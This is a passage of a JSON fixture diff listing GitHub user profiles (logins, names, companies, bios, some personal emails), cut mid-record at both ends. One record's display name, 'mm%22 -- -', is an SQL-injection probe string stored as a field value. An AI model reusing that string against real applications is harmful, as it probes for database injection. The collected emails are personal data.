"2023-08-26T10:48:28Z", + "node_id": "MDQ6VXNlcjE2OTU0MTU0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 998, + "fields": { + "nest_created_at": "2024-09-11T22:39:09.235Z", + "nest_updated_at": "2024-09-11T22:39:09.235Z", + "name": "", + "login": "rgvargas29", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/48107390?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-02-28T22:31:37Z", + "updated_at": "2021-01-28T22:52:33Z", + "node_id": "MDQ6VXNlcjQ4MTA3Mzkw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 999, + "fields": { + "nest_created_at": "2024-09-11T22:39:14.714Z", + "nest_updated_at": "2024-09-11T22:39:14.714Z", + "name": "", + "login": "SandakovMM", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4586815?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 29, + "created_at": "2013-06-01T11:30:22Z", + "updated_at": "2024-09-03T09:15:42Z", + "node_id": "MDQ6VXNlcjQ1ODY4MTU=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1000, + "fields": { + "nest_created_at": "2024-09-11T22:39:17.225Z", + "nest_updated_at": "2024-09-11T22:39:17.225Z", + "name": "Gianks", + "login": "gianks", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3036776?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2012-12-13T19:58:24Z", + "updated_at": "2023-07-16T18:37:12Z", + "node_id": "MDQ6VXNlcjMwMzY3NzY=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1001, + "fields": { + "nest_created_at": "2024-09-11T22:39:18.880Z", + "nest_updated_at": "2024-09-22T19:48:16.931Z", + "name": "", + "login": "azurit", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1083063?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 17, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2011-09-27T07:32:48Z", + "updated_at": "2024-07-23T13:34:30Z", + "node_id": "MDQ6VXNlcjEwODMwNjM=", + "bio": "I'm security engineer with 20+ years of experience in the field of information security. Follow me if you like my work.\r\n", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1002, + "fields": { + "nest_created_at": "2024-09-11T22:39:20.527Z", + "nest_updated_at": "2024-09-11T22:39:35.742Z", + "name": "Patrick Schleizer", + "login": "adrelanos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1985040?v=4", + "company": "@Kicksecure @Whonix", + "location": "online", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 279, + "public_gists_count": 8, + "public_repositories_count": 318, + "created_at": "2012-07-16T15:12:46Z", + "updated_at": "2024-08-04T20:06:57Z", + "node_id": "MDQ6VXNlcjE5ODUwNDA=", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1003, + "fields": { + "nest_created_at": "2024-09-11T22:39:26.386Z", + "nest_updated_at": "2024-09-11T22:39:26.386Z", + "name": "", + "login": "pgajdos", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4067843?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 6, + "created_at": "2013-04-05T10:24:10Z", + "updated_at": "2024-08-28T08:57:36Z", + "node_id": "MDQ6VXNlcjQwNjc4NDM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1004, + "fields": { + "nest_created_at": "2024-09-11T22:39:28.570Z", + "nest_updated_at": "2024-09-11T22:39:28.570Z", + "name": "Superman", + "login": "hygeiavvv", + "email": "php01@qq.com", + "avatar_url": "https://avatars.githubusercontent.com/u/40749820?v=4", + "company": "", + "location": "郑州", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2018-07-02T03:38:33Z", + "updated_at": "2024-07-08T02:51:30Z", + "node_id": "MDQ6VXNlcjQwNzQ5ODIw", + "bio": "Can finally write bugs independently", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1005, + "fields": { + "nest_created_at": "2024-09-11T22:39:30.642Z", + "nest_updated_at": "2024-09-11T22:39:30.642Z", + "name": "Adam Stracener", + "login": "NeckBeardPrince", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6558867?v=4", + "company": "MRI NASA", + "location": "Brentwood, TN", + "collaborators_count": 0, + "following_count": 79, + "followers_count": 19, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2014-02-01T02:00:11Z", + "updated_at": "2024-08-27T19:51:26Z", + "node_id": "MDQ6VXNlcjY1NTg4Njc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1006, + "fields": { + "nest_created_at": "2024-09-11T22:39:32.292Z", + "nest_updated_at": "2024-09-22T18:39:05.483Z", + "name": "Andrei Belov", + "login": "defanator", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1309027?v=4", + "company": "@F5Networks", + "location": "Dubai, UAE", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 42, + "public_gists_count": 34, + "public_repositories_count": 108, + "created_at": "2012-01-06T09:57:46Z", + "updated_at": "2024-08-09T15:35:45Z", + "node_id": "MDQ6VXNlcjEzMDkwMjc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1007, + "fields": { + "nest_created_at": "2024-09-11T22:39:33.975Z", + "nest_updated_at": "2024-09-22T19:48:20.818Z", + "name": "Matteo Pace", + "login": "M4tteoP", + "email": "matteo@tetrate.io", + "avatar_url": "https://avatars.githubusercontent.com/u/26764726?v=4", + "company": "@tetrateio", + "location": "Torino, Italy (UTC +1/+2)", + "collaborators_count": 0, + "following_count": 29, + "followers_count": 21, + "public_gists_count": 1, + "public_repositories_count": 40, + "created_at": "2017-03-29T10:06:12Z", + "updated_at": "2024-08-10T15:35:25Z", + "node_id": "MDQ6VXNlcjI2NzY0NzI2", + "bio": "Cloud, Meshy and Security things. Eng at @tetrateio | Maintainer at OWASP @corazawaf | Dev at OWASP @coreruleset.\r\n\r\nCybersecurity MSc @ Polytechnic of Turin.", + "is_hireable": false, + "twitter_username": "M4tteoP" + } +}, +{ + "model": "github.user", + "pk": 1008, + "fields": { + "nest_created_at": "2024-09-11T22:39:37.008Z", + "nest_updated_at": "2024-09-11T22:39:37.008Z", + "name": "", + "login": "mthbrown", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/22183215?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 5, + "created_at": "2016-09-13T23:28:28Z", + "updated_at": "2021-10-31T16:46:35Z", + "node_id": "MDQ6VXNlcjIyMTgzMjE1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1009, + "fields": { + "nest_created_at": "2024-09-11T22:39:38.292Z", + "nest_updated_at": "2024-09-11T22:39:38.292Z", + "name": "mm%22 -- -", + "login": "KernelPan1k", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3338681?v=4", + "company": "", + "location": "ee35e7c782791419f29316f183d5d6d3", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 28, + "public_gists_count": 2, + "public_repositories_count": 53, + "created_at": "2013-01-22T12:21:04Z", + "updated_at": "2024-08-20T17:34:06Z", + "node_id": "MDQ6VXNlcjMzMzg2ODE=", + "bio": "LPIC / Pentest+ / KLCP / OSCP / OSWP / OSWE / CBBH", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1010, + "fields": { + "nest_created_at": "2024-09-11T22:39:39.940Z", + "nest_updated_at": "2024-09-11T22:39:39.940Z", + "name": "Adarsh", + "login": "pandey-adarsh147", + "email": "adarsh.pandey@gonuclei.com", + "avatar_url": "https://avatars.githubusercontent.com/u/433217?v=4", + "company": "Nuclei", + "location": "", + "collaborators_count": 0, + "following_count": 10, + "followers_count": 20, + "public_gists_count": 9, + "public_repositories_count": 59, + "created_at": "2010-10-09T06:17:11Z", + "updated_at": "2024-08-23T07:01:21Z", + "node_id": "MDQ6VXNlcjQzMzIxNw==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1011, + "fields": { + "nest_created_at": "2024-09-11T22:39:42.423Z", + "nest_updated_at": "2024-09-11T22:39:42.423Z", + "name": "", + "login": "mig5", + "email": "mig@mig5.net", + "avatar_url": "https://avatars.githubusercontent.com/u/99173?v=4", + "company": "mig5 system administration", + "location": "Melbourne", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 21, + "public_repositories_count": 10, + "created_at": "2009-06-26T13:09:21Z", + "updated_at": "2024-08-28T21:38:27Z", + "node_id": "MDQ6VXNlcjk5MTcz", + "bio": "System administration as a service", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1012, + "fields": { + "nest_created_at": "2024-09-11T22:39:43.663Z", + "nest_updated_at": "2024-09-11T22:39:43.663Z", + "name": "Taymindis Woon", + "login": "Taymindis", + "email": "taymindis@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/14217761?v=4", + "company": "CloudleStudio.com", + "location": "Singapore", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 46, + "public_gists_count": 8, + "public_repositories_count": 59, + "created_at": "2015-09-10T12:44:07Z", + "updated_at": "2024-09-05T09:40:37Z", + "node_id": "MDQ6VXNlcjE0MjE3NzYx", + "bio": "A guy who work as a software architect in IT solution Company in Singapore. Proficient in security, scalability application", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1013, + "fields": { + "nest_created_at": "2024-09-11T22:39:44.948Z", + "nest_updated_at": "2024-09-22T18:39:12.299Z", + "name": "Liu Dongmiao", + "login": "liudongmiao", + "email": "liudongmiao@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/473522?v=4", + "company": "", + "location": "China", + "collaborators_count": 0, + "following_count": 15, + "followers_count": 353, + "public_gists_count": 7, + "public_repositories_count": 28, + "created_at": "2010-11-09T03:49:03Z", + "updated_at": "2024-09-10T05:24:56Z", + "node_id": "MDQ6VXNlcjQ3MzUyMg==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1014, + "fields": { + "nest_created_at": "2024-09-11T22:39:47.906Z", + "nest_updated_at": "2024-09-11T22:39:47.906Z", + "name": "", + "login": "regazzoj", + "email": "jeanbaptiste.regazzoni@protonmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6738167?v=4", + "company": "", + "location": "Lozère", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2014-02-20T14:17:20Z", + "updated_at": "2024-07-16T14:51:43Z", + "node_id": "MDQ6VXNlcjY3MzgxNjc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1015, + "fields": { + "nest_created_at": "2024-09-11T22:39:49.120Z", + "nest_updated_at": "2024-09-11T22:51:18.085Z", + "name": "", + "login": "amsnek", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/73526449?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2020-10-27T09:38:04Z", + "updated_at": "2022-07-15T09:22:25Z", + "node_id": "MDQ6VXNlcjczNTI2NDQ5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1016, + "fields": { + "nest_created_at": "2024-09-11T22:39:50.375Z", + "nest_updated_at": "2024-09-11T22:39:50.375Z", + "name": "Jacob Bohanon", + "login": "jbohanon", + "email": "jacobbohanon@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/57016439?v=4", + "company": "@solo-io ", + "location": "", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2019-10-25T19:03:52Z", + "updated_at": "2024-08-29T14:37:29Z", + "node_id": "MDQ6VXNlcjU3MDE2NDM5", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1017, + "fields": { + "nest_created_at": "2024-09-11T22:39:51.609Z", + "nest_updated_at": "2024-09-11T22:39:51.609Z", + "name": "TW - Vincent", + "login": "touchweb-vincent", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/315173?v=4", + "company": "TOUCHWEB", + "location": "FRANCE", + "collaborators_count": 0, + "following_count": 30, + "followers_count": 15, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2010-06-26T12:35:50Z", + "updated_at": "2024-06-19T13:16:27Z", + "node_id": "MDQ6VXNlcjMxNTE3Mw==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1018, + "fields": { + "nest_created_at": "2024-09-11T22:39:54.538Z", + "nest_updated_at": "2024-09-11T22:39:54.538Z", + "name": "", + "login": "cpschoenrank", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/113054688?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-09-07T17:51:54Z", + "updated_at": "2022-09-07T17:51:54Z", + "node_id": "U_kgDOBr0T4A", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1019, + "fields": { + "nest_created_at": "2024-09-11T22:39:57.464Z", + "nest_updated_at": "2024-09-11T22:39:57.464Z", + "name": "", + "login": "nagri", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8038237?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2014-07-01T14:36:07Z", + "updated_at": "2024-05-02T07:02:21Z", + "node_id": "MDQ6VXNlcjgwMzgyMzc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1020, + "fields": { + "nest_created_at": "2024-09-11T22:39:58.724Z", + "nest_updated_at": "2024-09-11T22:40:02.077Z", + "name": "", + "login": "TomasKorbar", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/25184281?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 0, + "public_repositories_count": 40, + "created_at": "2017-01-17T19:50:56Z", + "updated_at": "2024-09-03T11:43:03Z", + "node_id": "MDQ6VXNlcjI1MTg0Mjgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1021, + "fields": { + "nest_created_at": "2024-09-11T22:40:04.173Z", + "nest_updated_at": "2024-09-11T22:40:04.173Z", + "name": "Dale Phurrough", + "login": "diablodale", + "email": "dale@hidale.com", + "avatar_url": "https://avatars.githubusercontent.com/u/679350?v=4", + "company": "", + "location": "Berlin, Germany", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 52, + "public_gists_count": 5, + "public_repositories_count": 83, + "created_at": "2011-03-20T00:35:30Z", + "updated_at": "2024-02-14T21:46:11Z", + "node_id": "MDQ6VXNlcjY3OTM1MA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1022, + "fields": { + "nest_created_at": "2024-09-11T22:40:06.341Z", + "nest_updated_at": "2024-09-11T22:40:06.341Z", + "name": "", + "login": "TomCan", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2892620?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 10, + "public_gists_count": 25, + "public_repositories_count": 25, + "created_at": "2012-11-26T14:09:04Z", + "updated_at": "2024-08-13T20:29:25Z", + "node_id": "MDQ6VXNlcjI4OTI2MjA=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1023, + "fields": { + "nest_created_at": "2024-09-11T22:40:10.163Z", + "nest_updated_at": "2024-09-11T22:40:10.163Z", + "name": "", + "login": "git-madresc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/37631220?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2018-03-21T16:45:07Z", + "updated_at": "2024-06-14T13:23:11Z", + "node_id": "MDQ6VXNlcjM3NjMxMjIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1024, + "fields": { + "nest_created_at": "2024-09-11T22:40:12.994Z", + "nest_updated_at": "2024-09-11T22:40:12.994Z", + "name": "", + "login": "borisovdmitrii", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/24451720?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2016-12-08T08:40:40Z", + "updated_at": "2023-05-29T17:01:07Z", + "node_id": "MDQ6VXNlcjI0NDUxNzIw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1025, + "fields": { + "nest_created_at": "2024-09-11T22:40:19.369Z", + "nest_updated_at": "2024-09-22T19:48:18.189Z", + "name": "theMiddle", + "login": "theMiddleBlue", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4454961?v=4", + "company": "SicuraNext", + "location": "Italy", + "collaborators_count": 0, + "following_count": 50, + "followers_count": 358, + "public_gists_count": 17, + "public_repositories_count": 28, + "created_at": "2013-05-17T07:45:38Z", + "updated_at": "2024-09-10T13:57:01Z", + "node_id": "MDQ6VXNlcjQ0NTQ5NjE=", + "bio": "Founder @ Rev3rse Security / I ❤️ to break application firewalls.", + "is_hireable": false, + "twitter_username": "AndreaTheMiddle" + } +}, +{ + "model": "github.user", + "pk": 1026, + "fields": { + "nest_created_at": "2024-09-11T22:40:20.995Z", + "nest_updated_at": "2024-09-11T22:40:20.995Z", + "name": "", + "login": "jakubsuchy", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/234124?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 6, + "public_gists_count": 5, + "public_repositories_count": 30, + "created_at": "2010-03-31T12:57:57Z", + "updated_at": "2024-08-27T06:10:49Z", + "node_id": "MDQ6VXNlcjIzNDEyNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1027, + "fields": { + "nest_created_at": "2024-09-11T22:40:25.535Z", + "nest_updated_at": "2024-09-11T22:40:25.535Z", + "name": "", + "login": "Rtw915", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51250006?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2019-05-31T23:12:58Z", + "updated_at": "2024-07-02T23:06:01Z", + "node_id": "MDQ6VXNlcjUxMjUwMDA2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1028, + "fields": { + "nest_created_at": "2024-09-11T22:40:26.381Z", + "nest_updated_at": "2024-09-11T22:40:26.381Z", + "name": "Dominik Shaim Ulrich", + "login": "ShaiMagal", + "email": "czshaimagal@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/8518736?v=4", + "company": "OPENSERVIS", + "location": "Celá ČR", + "collaborators_count": 0, + "following_count": 8, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2014-08-22T00:26:56Z", + "updated_at": "2024-09-10T16:13:24Z", + "node_id": "MDQ6VXNlcjg1MTg3MzY=", + "bio": "www.openservis.cz (PrestaShop webhosting) | www.psmoduly.cz (PrestaShop modules) + EN version www.prestahouse.eu | www.smartmailer.cz (PrestaShop newsletter) |", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1029, + "fields": { + "nest_created_at": "2024-09-11T22:40:29.752Z", + "nest_updated_at": "2024-09-11T22:40:29.752Z", + "name": "", + "login": "cerebox", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/131694684?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2023-04-24T15:51:57Z", + "updated_at": "2023-12-15T08:17:42Z", + "node_id": "U_kgDOB9mAXA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1030, + "fields": { + "nest_created_at": "2024-09-11T22:40:30.969Z", + "nest_updated_at": "2024-09-12T02:28:12.788Z", + "name": "leveryd", + "login": "leveryd", + "email": "leveryd@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/1846319?v=4", + "company": "", + "location": "China Beijing", + "collaborators_count": 0, + "following_count": 54, + "followers_count": 295, + "public_gists_count": 29, + "public_repositories_count": 56, + "created_at": "2012-06-13T12:15:02Z", + "updated_at": "2024-01-22T09:07:47Z", + "node_id": "MDQ6VXNlcjE4NDYzMTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1031, + "fields": { + "nest_created_at": "2024-09-11T22:40:32.308Z", + "nest_updated_at": "2024-09-11T22:40:32.308Z", + "name": "Austin Zhai", + "login": "singchia", + "email": "singchia1202@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/15531166?v=4", + "company": "@bytedance", + "location": "Hangzhou, China", + "collaborators_count": 0, + "following_count": 18, + "followers_count": 56, + "public_gists_count": 13, + "public_repositories_count": 41, + "created_at": "2015-11-01T06:10:31Z", + "updated_at": "2024-08-03T03:06:34Z", + "node_id": "MDQ6VXNlcjE1NTMxMTY2", + "bio": "Network and infra engineer, focus on network virtualization and functions( networking stack, SDN, Netfilter, DPDK, eBPF/XDP, CNI, Routings and some others).", + "is_hireable": true, + "twitter_username": "austinzhai1202" + } +}, +{ + "model": "github.user", + "pk": 1032, + "fields": { + "nest_created_at": "2024-09-11T22:40:33.983Z", + "nest_updated_at": "2024-09-11T22:40:33.983Z", + "name": "Mark JL (_jail)", + "login": "mark-jordanovic-lewis", + "email": "mark.4ndrew.lewis@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/20165821?v=4", + "company": "SenseOn", + "location": "morbidslug@home", + "collaborators_count": 0, + "following_count": 35, + "followers_count": 16, + "public_gists_count": 5, + "public_repositories_count": 41, + "created_at": "2016-06-27T10:49:58Z", + "updated_at": "2024-06-12T07:42:51Z", + "node_id": "MDQ6VXNlcjIwMTY1ODIx", + "bio": "DevOps at SenseOn. Mustache not to scale.\r\n\r\nI like coding and learning and guitars.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1033, + "fields": { + "nest_created_at": "2024-09-11T22:40:40.230Z", + "nest_updated_at": "2024-09-11T22:40:40.230Z", + "name": "", + "login": "gabinheylen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/72017460?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2020-09-28T10:38:33Z", + "updated_at": "2024-09-04T12:03:24Z", + "node_id": "MDQ6VXNlcjcyMDE3NDYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1034, + "fields": { + "nest_created_at": "2024-09-11T22:40:41.480Z", + "nest_updated_at": "2024-09-22T19:48:20.472Z", + "name": "Esad Cetiner", + "login": "EsadCetiner", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/104706115?v=4", + "company": "", + "location": "Melbourne Australia", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2022-05-01T03:36:22Z", + "updated_at": "2024-09-21T17:32:04Z", + "node_id": "U_kgDOBj2wQw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1035, + "fields": { + "nest_created_at": "2024-09-11T22:40:44.897Z", + "nest_updated_at": "2024-09-22T18:39:16.157Z", + "name": "Frank Vanbever", + "login": "frankvanbever", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1665441?v=4", + "company": "@essensium-mind ", + "location": "Belgium", + "collaborators_count": 0, + "following_count": 13, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 30, + "created_at": "2012-04-21T11:16:46Z", + "updated_at": "2024-09-22T08:04:09Z", + "node_id": "MDQ6VXNlcjE2NjU0NDE=", + "bio": "", + "is_hireable": false, + "twitter_username": "fvbever" + } +}, +{ + "model": "github.user", + "pk": 1036, + "fields": { + "nest_created_at": "2024-09-11T22:40:46.597Z", + "nest_updated_at": "2024-09-11T22:40:46.597Z", + "name": "", + "login": "sivsoft", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/106741284?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-06-02T10:30:41Z", + "updated_at": "2024-07-17T22:17:26Z", + "node_id": "U_kgDOBly-JA", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1037, + "fields": { + "nest_created_at": "2024-09-11T22:40:47.846Z", + "nest_updated_at": "2024-09-22T20:21:53.465Z", + "name": "", + "login": "Seppl2202", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38285208?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 1, + "public_repositories_count": 8, + "created_at": "2018-04-11T12:03:01Z", + "updated_at": "2024-08-16T11:31:37Z", + "node_id": "MDQ6VXNlcjM4Mjg1MjA4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1038, + "fields": { + "nest_created_at": "2024-09-11T22:40:49.185Z", + "nest_updated_at": "2024-09-11T22:40:49.185Z", + "name": "Shivam yadav", + "login": "Shivam0609", + "email": "shivamyadav.cse171168@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/27969092?v=4", + "company": "Sopra Banking Solutions", + "location": "Noida", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 20, + "created_at": "2017-04-24T17:20:17Z", + "updated_at": "2024-03-11T04:31:38Z", + "node_id": "MDQ6VXNlcjI3OTY5MDky", + "bio": "Hi, I'm a DevOps Engineer. I like to create new projects and share with others. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1039, + "fields": { + "nest_created_at": "2024-09-11T22:40:50.447Z", + "nest_updated_at": "2024-09-11T22:40:50.447Z", + "name": "", + "login": "logopk", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/14347357?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2015-09-18T12:34:29Z", + "updated_at": "2024-09-06T08:35:11Z", + "node_id": "MDQ6VXNlcjE0MzQ3MzU3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1040, + "fields": { + "nest_created_at": "2024-09-11T22:40:57.443Z", + "nest_updated_at": "2024-09-22T19:35:11.261Z", + "name": "Marko", + "login": "no-sec-marko", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17177924?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 12, + "created_at": "2016-02-11T13:02:52Z", + "updated_at": "2024-07-25T11:06:59Z", + "node_id": "MDQ6VXNlcjE3MTc3OTI0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1041, + "fields": { + "nest_created_at": "2024-09-11T22:40:58.705Z", + "nest_updated_at": "2024-09-11T22:40:58.705Z", + "name": "", + "login": "ic32k", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/45407347?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 4, + "followers_count": 2, + "public_gists_count": 1, + "public_repositories_count": 75, + "created_at": "2018-11-27T22:38:22Z", + "updated_at": "2024-08-30T15:45:58Z", + "node_id": "MDQ6VXNlcjQ1NDA3MzQ3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1042, + "fields": { + "nest_created_at": "2024-09-11T22:40:59.945Z", + "nest_updated_at": "2024-09-11T22:40:59.945Z", + "name": "", + "login": "vukitoso", + "email": "", + "avatar_url": 